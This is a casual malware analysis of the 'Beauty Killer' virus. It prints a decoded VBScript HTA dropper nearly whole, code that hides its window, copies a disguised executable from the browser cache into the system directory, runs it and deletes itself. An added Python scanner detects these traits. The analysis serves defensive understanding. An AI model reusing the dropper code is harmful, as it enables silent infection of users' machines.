
Beauty Pictures Spreading a Virus: A Full Breakdown of How the "Beauty Killer" Propagates

    See that? The tail is showing!!! These two files are the key. So I downloaded both of them (never mind the extensions).

    I first opened winups.asp (in Notepad, and noticed the file begins with the letters MZ). Ha, so this is actually an .exe file. Leave it aside for now and look at the other one, which is relatively simple: open it and it is a chunk of script code (damn, encrypted yet again). No choice but to decode it, which gives the following code:

    <object id=''wsh'' classid=''clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B''></object>

    <HTA:APPLICATION caption="no" border="none" visiable="no" windowState="minimize" >

    ....This sets up the scripting object

    <script LaNGUAGE="VBScript.Encode">

    window.moveTo -100,-100

    ....Ha, it even uses this trick to hide the window

    Set g_fs = CreateObject("Scripting.FileSystemObject")

    Set tf = g_fs.CreateTextFile("c:\isp.hta",true)

    ....See, here it comes, the file operations begin

    tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " visiable=" & CHR(34)& "no" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10)

    .....Looks like the author is using a script to write a script. Ruthless!!!

    tf.write "<object id=''wsh'' cl"& chr(97)&"ssid=''clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B''></object>"&chr(13)&chr(10)

    .....F935DC22-1CF0-11D0-ADB9-00C04FD58A0B is the class id (CLSID) of the WSH Shell object

    tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)

    tf.write "on error resume next"&chr(13)&chr(10)

    tf.write "window.moveTo -100,-100"&chr(13)&chr(10)

    tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)

    tf.write "dim exepath"&chr(13)&chr(10)

    tf.write "Function Search(objFolder) "&chr(13)&chr(10)

    tf.write "Dim objSubFolder"&chr(13)&chr(10)

    tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)

    tf.write "If InStr(1, objfile.name, " & CHR(34)& "winups" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10)

    tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)

    tf.write "filecp.copy (exepath)"&chr(13)&chr(10)

    tf.write "exit for"&chr(13)&chr(10)

    tf.write "End If"&chr(13)&chr(10)

    tf.write "Next "&chr(13)&chr(10)

    tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10)

    tf.write "Search objSubFolder"&chr(13)&chr(10)

    tf.write "Next"&chr(13)&chr(10)

    tf.write "End Function"&chr(13)&chr(10)

    ....This function locates the winups file and copies it into the system directory....

    tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10)

    tf.write "str=WSH.regread(" & CHR(34)&   "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10)

    ....This is looking up the cache directory

    tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)

    tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)

    tf.write "exepath=othisfolder.path & "& chr(34) & "\win.exe" & chr(34) &chr(13)&chr(10)

    tf.write "search tempfolder"&chr(13)&chr(10)

    ....Really, it even copies it into the system directory, nasty

    tf.write "wsh.run (exepath)"&chr(13)&chr(10)

    tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"&chr(13)&chr(10)

    ....Heh, and it does not forget to delete itself afterwards. Good habit, worth learning

    tf.write "window.close()"&chr(13)&chr(10)

    tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)

    tf.close
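As an added, defender-side example that is not part of the original write-up: a small Python scanner for the traits this dropper shows. It folds the `"..." & chr(N) & "..."` concatenation trick so the split `classid` becomes visible, matches the indicators seen above (WSH Shell CLSID, off-screen window, writing an .hta to disk, reading the cache Shell Folders key, GetSpecialFolder(1), self-deletion via command.com), and flags a file whose bytes start with MZ under a non-executable name, like winups.asp. The sample script body and all names are constructed assumptions for illustration.

```python
import re

# Indicators drawn from the isp.hta dropper dissected above. The CLSID is the
# WSH Shell object the dropper instantiates through an <object> tag.
WSH_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
INDICATORS = {
    "wsh_shell_object": re.compile(r"classid\s*=\s*\W*clsid:" + re.escape(WSH_CLSID), re.I),
    "offscreen_window": re.compile(r"window\.moveTo\s+-\d+\s*,\s*-\d+", re.I),
    "writes_hta_to_disk": re.compile(r'CreateTextFile\s*\(\s*"[^"]*\.hta"', re.I),
    "reads_cache_folder_key": re.compile(r"Shell Folders\\cache", re.I),
    "copies_to_system_dir": re.compile(r"GetSpecialFolder\s*\(\s*1\s*\)", re.I),
    "self_delete": re.compile(r"(?:command\.com|cmd(?:\.exe)?)\s*/c\s+del\b", re.I),
}

# A chain of string literals and chr(N) calls joined by '&', the trick the
# dropper uses to split "classid" into cl"& chr(97)&"ssid.
CONCAT_CHAIN = re.compile(
    r'(?:"[^"]*"|chr\s*\(\s*\d+\s*\))(?:\s*&\s*(?:"[^"]*"|chr\s*\(\s*\d+\s*\)))+', re.I)
PART = re.compile(r'"([^"]*)"|chr\s*\(\s*(\d+)\s*\)', re.I)

def fold_concats(script: str) -> str:
    """Collapse every '&' chain into one literal so split tokens become visible."""
    def join(m):
        parts = PART.findall(m.group(0))  # [(literal, ""), ("", "97"), ...]
        return '"' + "".join(chr(int(n)) if n else s for s, n in parts) + '"'
    return CONCAT_CHAIN.sub(join, script)

def scan_script(text: str) -> list:
    """Sorted names of the dropper indicators present in an HTA/VBScript body."""
    folded = fold_concats(text)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(folded))

def is_disguised_pe(data: bytes, filename: str) -> bool:
    """MZ header under a non-executable name, as with winups.asp above."""
    exe_ext = (".exe", ".dll", ".scr", ".com", ".sys")
    return data[:2] == b"MZ" and not filename.lower().endswith(exe_ext)

# Constructed sample that mimics the dropper's structure; not the real file.
SAMPLE_DROPPER = r'''<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
window.moveTo -100,-100
Set tf = g_fs.CreateTextFile("c:\isp.hta",true)
tf.write "<object id=''wsh'' cl"& chr(97)&"ssid=''clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B''></object>"
tf.write "str=WSH.regread(" & CHR(34)& "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"
tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)"
tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"
'''
OBFUSCATED_LINE = SAMPLE_DROPPER.splitlines()[3]  # the cl"& chr(97)&"ssid line
```

Run `scan_script` over the decoded script text and `is_disguised_pe` over the raw bytes of each downloaded file; the obfuscated `classid` line is only caught once the chr() chain has been folded.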
